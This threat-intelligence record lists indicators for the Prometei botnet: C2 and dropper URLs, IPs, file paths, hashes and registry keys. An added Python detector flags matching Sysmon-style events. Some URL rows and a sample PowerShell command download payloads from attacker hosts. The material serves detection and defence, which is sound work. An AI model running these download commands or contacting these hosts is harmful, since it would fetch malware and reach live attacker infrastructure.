Unmasking Prometei A Deep Dive Into Our MXDR Findings
Common Information
Type | Value
UUID | f9771417-b45b-4042-a478-42f4c152e37a
Fingerprint | 94e9b8fc25378e81
Analysis status | DONE
Considered CTI value | 2
Text language |
Published | Oct. 23, 2024, midnight
Added to db | Oct. 23, 2024, 3:28 p.m.
Last updated | Nov. 17, 2024, 6:55 p.m.
Headline | Unmasking Prometei: A Deep Dive Into Our MXDR Findings
Title | Unmasking Prometei A Deep Dive Into Our MXDR Findings
Detected Hints/Tags/Attributes | 112/3/158
RSS Feed
Id | Enabled | Feed title | Url | Added to db
119 |  | Trend Micro Research, News and Perspectives | https://feeds.feedburner.com/TrendMicroSimplySecurity | 2024-08-30 22:08
Attributes
Type | #Events | Value
CVE | 197 | cve-2019-0708
CVE | 126 | cve-2021-27065
CVE | 92 | cve-2021-26858
Domain | 1 | 210.160.map
Domain | 4 | p2.feefreepool.net
Domain | 2 | xinchaocacebm.com
Domain | 2 | xinchaocacebd.com
Domain | 2 | xinchaobjcebl.com
Domain | 2 | xinchaobjcebj.net
Domain | 2 | xinchaocacebp.net
Domain | 2 | xinchaocacebi.net
Domain | 2 | xinchaobjcebi.net
Domain | 2 | xinchaobjcebe.org
Domain | 2 | xinchaocacebo.org
Domain | 2 | xinchaocacebd.net
Domain | 2 | xinchaobjcebn.org
Domain | 2 | xinchaobjcebk.com
Domain | 2 | xinchaocacebi.com
Domain | 2 | xinchaocacebj.com
Domain | 2 | xinchaobjcebb.com
Domain | 2 | xinchaobjcebf.com
Domain | 1 | appserv.zip
Domain | 4 | appserv180.zip
Domain | 6 | gb7ni5rgeexdcncj.onion
Domain | 3 | mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero
File | 1 | c:\windows\uplugplay c:\windows\netwalker c:\windows\updates1.7z
File | 1 | c:\windows\updates2.7z
File | 1 | c:\windows\mshlpda32.dll
File | 1 | c:\windows\7z.exe
File | 40 | 7z.exe
File | 1 | updates1.7z
File | 1 | updates2.7z
File | 6 | sqhost.exe
File | 7 | libssp-0.dll
File | 12 | libcrypto-1_1.dll
File | 2 | windrlver.exe
File | 1 | miwalk64.exe
File | 1 | miwalk32.exe
File | 3 | c:\windows\zsvc.exe
File | 2 | c:\windows\sqhost.exe
File | 409 | c:\windows\system32\cmd.exe
File | 2125 | cmd.exe
File | 2 | c:\windows\dell\miwalk.exe
File | 2 | c:\windows\dell\ssldata2.dll
File | 142 | wmiprvse.exe
File | 1 | c:\windows\updates1.7z
File | 1 | c:\windows\7z.dll
File | 1 | c:\windows\winhlpx64.exe
File | 1 | c:\windows\ssldata2.dll
File | 15 | k.php
File | 4 | zsvc.exe
File | 20 | 7z.dll
File | 3 | 7z32.dll
File | 3 | 7z32.exe
File | 1 | std.7z
File | 3 | std2.7z
File | 1208 | powershell.exe
File | 2 | '7z.dll
File | 2 | '7z.exe
File | 1 | 'std.7z
File | 2 | c:\windows\dell\7z.exe
File | 1 | walker.ini
File | 10 | dwn.php
File | 1 | c:\windows\dell\walker.ini
File | 9 | socks.exe
File | 1 | setup_gitlog.txt
File | 2 | c:\windows\temp\setup_gitlog.txt
File | 2 | c:\windows\dell\rdpciip.exe
File | 30 | rdpclip.exe
File | 1 | c:\windows\dell\nethelper4.exe
File | 1 | c:\windows\dell\windrlver.exe
File | 3 | srch.7z
File | 27 | searchindexer.exe
File | 2 | 'searchindexer.exe
File | 1 | 'srch.7z
File | 6 | desktop.txt
File | 3 | c:\windows\dell\desktop.dat
File | 2 | c:\windows\dell\searchindexer.exe
File | 1 | c:\windows\dell\appserv.zip
File | 2 | c:\windows\dell\7z.dll
File | 1 | c:\programdata\microsoft\appserv\www\index.php
File | 3 | appserv180.zip
File | 1 | c:\windows\dell\7z x c:\windows\dell\appserv.zip
File | 1 | appserv.zip
File | 1 | ssimple.php
File | 1 | shell-abc123def456.php
File | 1 | rnd+'.php
File | 1 | c:\programdata\microsoft\appserv\www\ssimple.php
File | 62 | taskhost.exe
File | 33 | php.ini
File | 1 | c:\windows for accessibility and start the ktmrmsvc service to run taskhost.exe
File | 1 | c:\programdata\microsoft\appserv\php5\php.ini
File | 1 | 'appserv180.zip
File | 1 | c:\windows\dell\msdtc.exe
File | 2 | smcard.exe
File | 55 | msdtc.exe
File | 1 | c:\windows\dell\smcard.exe
File | 1 | mshlpda32.dll
File | 1 | c:\windows c:\windows\system32\cmd.exe
File | 1 | c:\windows delete exisiting uplugplay service and a create uplugplay service c:\windows\system32\cmd.exe
File | 1 | %appdata%\intel\sqhost.exe
File | 1 | c:\users\dyituser_764\appdata\roaming\intel\sqhost.exe
File | 5 | rdpciip.exe
File | 1 | netsync_v2.exe
File | 1 | nvstub_v2.exe
File | 1 | netdefender.exe
File | 1 | winhlpx64.exe
File | 4 | miwalk.exe
File | 1 | c:\windows\dell\slldata2.dll
File | 2 | rdclip.exe
File | 3 | nvsync.exe
sha1 | 2 | 962f3d0b35b9ff68cdba31a039ead12b5789e7f6
sha1 | 1 | 344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
sha1 | 2 | 20fea1314dbed552d5fedee096e2050369172ee1
sha1 | 2 | 9280b1466527cb5b22c77c6cf42a3085a68dd326
sha1 | 2 | de16ad97be7fefcd7b830413e7d4d56ef96fb02b
IPv4 | 2 | 196.7.210.6
IPv4 | 2 | 196.7.209.178
IPv4 | 4 | 103.40.123.34
IPv4 | 4 | 88.198.246.242
IPv4 | 2 | 103.41.204.104
IPv4 | 295 | 8.8.8.8
IPv4 | 2 | 187.79.243.171
IPv4 | 2 | 196.7.210.160
IPv4 | 8 | 10.0.0.254
IPv4 | 1 | 10.17.0.42
IPv4 | 2 | 180.169.1.207
IPv4 | 2 | 155.207.200.242
IPv4 | 1 | 10.17.0.254
IPv4 | 2 | 134.88.5.200
IPv4 | 2 | 187.133.137.81
IPv4 | 2 | 145.239.200.92
IPv4 | 2 | 142.4.205.155
IPv4 | 2 | 89.163.213.192
IPv4 | 2 | 45.194.35.180
Url | 2 | http://103.40.123.34/k.php?b=_amd64
Url | 1 | http://103.40.123.34/k.php?b=_amd64,psdn0020,504k45a188441r4ue',$p);$d=[io.file
Url | 2 | http://103.41.204.104/7z32.dll
Url | 2 | http://103.41.204.104/std2.7z
Url | 1 | http://103.41.204.104/7z32.dll','7z.dll
Url | 1 | http://103.41.204.104/7z32.exe','7z.exe
Url | 1 | http://103.41.204.104/std2.7z','std.7z
Url | 1 | http://103.41.204.104/dwn.php?d=walker.ini
Url | 2 | http://103.41.204.104
Url | 1 | http://103.41.204.104/srch.7z','srch.7z');}"&sqhost.exe
Url | 2 | http://103.41.204.104/7z32.exe
Url | 2 | http://45.194.35.180:180/appserv180.zip
Url | 2 | https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=9&i=n8q4y90o9t4mxh
Url | 1 | https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=3&i=9af2hyj240ifr4ug
Url | 4 | http://p2.feefreepool.net/cgi-bin/prometei.cgi
Url | 3 | http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
Url | 4 | http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Url | 6 | https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Windows Registry Key | 2 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay
Windows Registry Key | 3 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
Windows Registry Key | 1 | HKEY_LOCAL_MACHINE\SOFTWARE\Intel\Support
Windows Registry Key | 1 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fax
Windows Registry Key | 188 | HKCU\Software\Microsoft\Windows\CurrentVersion\Run
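The attribute list above is raw extractor output, and not every row is usable as a detection: bare names such as cmd.exe (2125 events), powershell.exe, msdtc.exe and rdpclip.exe are also legitimate Windows binaries, and 8.8.8.8 (295 events) is a public resolver. The signal is in the full paths (the c:\windows\dell\ drop directory, the per-user %appdata%\intel\sqhost.exe copy), the UPlugPlay service key, the hashes, and the dropper and C2 hosts in the Url rows. The Python below is an added example, not code from the Trend Micro post or from this database. It takes a subset of the indicators from the list, normalises constructed Sysmon-style process, network, DNS and registry events (field names follow Sysmon's schema; the events themselves are invented for the example, including the PowerShell command line, which is shaped after the DownloadFile('url','name') fragments in the Url rows), and flags a Windows binary name only when the image runs outside the directories the genuine binary lives in.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Indicator values copied from the attribute list on this page (a subset).
FILE_PATHS = {
    r"c:\windows\dell\msdtc.exe", r"c:\windows\dell\rdpciip.exe",
    r"c:\windows\dell\searchindexer.exe", r"c:\windows\dell\miwalk.exe",
    r"c:\windows\dell\walker.ini", r"c:\windows\sqhost.exe",
    r"c:\windows\zsvc.exe", r"c:\windows\winhlpx64.exe",
    r"%appdata%\intel\sqhost.exe",
    r"c:\programdata\microsoft\appserv\www\ssimple.php",
}
# Dropper / C2 hosts. 8.8.8.8 and the RFC 1918 gateways in the list are left
# out on purpose: they are resolver and LAN noise, not indicators.
IPS = {"103.40.123.34", "103.41.204.104", "45.194.35.180", "88.198.246.242"}
DOMAINS = {
    "p2.feefreepool.net", "gb7ni5rgeexdcncj.onion",
    "mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p",
    "xinchaocacebm.com", "xinchaobjcebl.com",
}
REG_KEYS = {
    r"hklm\system\currentcontrolset\services\uplugplay",
    r"hklm\software\intel\support",
}
SHA1S = {
    "962f3d0b35b9ff68cdba31a039ead12b5789e7f6",
    "344faf61c3eb76f4a2fb6452e83ed16c9cce73e0",
}
# Names from the list that are also genuine Windows binaries. A bare name
# match is noise; flag only an image running outside the normal locations.
MASQUERADE_NAMES = {"msdtc.exe", "rdpclip.exe", "searchindexer.exe", "taskhost.exe"}
LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

_APPDATA = re.compile(r"^c:\\users\\[^\\]+\\appdata\\roaming")
_URL = re.compile(r"""https?://[^\s'"<>)]+""", re.I)


def normalize_path(path: str) -> str:
    """Lower-case, unify slashes, fold a user profile path into %appdata%."""
    p = path.strip().strip("'\"").replace("/", "\\").lower()
    return _APPDATA.sub("%appdata%", p)


def normalize_key(key: str) -> str:
    k = key.strip().lower()
    return k.replace("hkey_local_machine", "hklm").replace("hkey_current_user", "hkcu")


def match_event(ev: dict) -> list[str]:
    """Return the indicator categories a single Sysmon-style event hits."""
    hits: list[str] = []
    img = normalize_path(ev.get("Image", ""))
    if img:
        if img in FILE_PATHS:
            hits.append("file_path")
        name = img.rsplit("\\", 1)[-1]
        if name in MASQUERADE_NAMES and not img.startswith(LEGIT_DIRS):
            hits.append("masquerade")
    if normalize_path(ev.get("TargetFilename", "")) in FILE_PATHS:
        hits.append("file_path")
    for part in ev.get("Hashes", "").split(","):
        if part.lower().startswith("sha1=") and part[5:].lower() in SHA1S:
            hits.append("sha1")
    if ev.get("DestinationIp") in IPS:
        hits.append("c2_ip")
    if ev.get("QueryName", "").lower().rstrip(".") in DOMAINS:
        hits.append("c2_domain")
    key = normalize_key(ev.get("TargetObject", ""))
    if any(key == k or key.startswith(k + "\\") for k in REG_KEYS):
        hits.append("registry")
    for url in _URL.findall(ev.get("CommandLine", "")):
        host = (urlsplit(url).hostname or "").lower()
        if host in IPS or host in DOMAINS:
            hits.append("url_in_cmdline")
            break
    return hits


def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map event id -> hits for every event that matched at least once."""
    return {ev["id"]: h for ev in events if (h := match_event(ev))}


# Constructed Sysmon-style events for the example (not telemetry from the post).
SAMPLE_EVENTS = [
    {"id": "e1", "EventID": 1, "Image": r"C:\Windows\dell\msdtc.exe",
     "Hashes": "SHA1=962F3D0B35B9FF68CDBA31A039EAD12B5789E7F6"},
    {"id": "e2", "EventID": 1, "Image": r"C:\Windows\System32\msdtc.exe",
     "Hashes": "SHA1=0000000000000000000000000000000000000000"},   # control: genuine MSDTC
    {"id": "e3", "EventID": 1,
     "Image": r"C:\Users\dyituser_764\AppData\Roaming\Intel\sqhost.exe"},
    {"id": "e4", "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://103.41.204.104/std2.7z','std.7z')\""},
    {"id": "e5", "EventID": 3, "DestinationIp": "8.8.8.8", "DestinationPort": 53},
    {"id": "e6", "EventID": 3, "DestinationIp": "45.194.35.180", "DestinationPort": 180},
    {"id": "e7", "EventID": 22, "QueryName": "p2.feefreepool.net"},
    {"id": "e8", "EventID": 13, "TargetObject":
     r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay\ImagePath"},
    {"id": "e9", "EventID": 1, "Image": r"C:\Windows\System32\rdpclip.exe"},   # control
]

if __name__ == "__main__":
    for eid, hits in scan(SAMPLE_EVENTS).items():
        print(eid, hits)
```

Two design points carry over to real telemetry: path matching must normalise the per-user profile directory, otherwise the %appdata%\intel\sqhost.exe row never matches the c:\users\dyituser_764\... form the same list records, and the registry check must treat the UPlugPlay key as a prefix, because Sysmon logs the value path (ImagePath, Start) rather than the bare key.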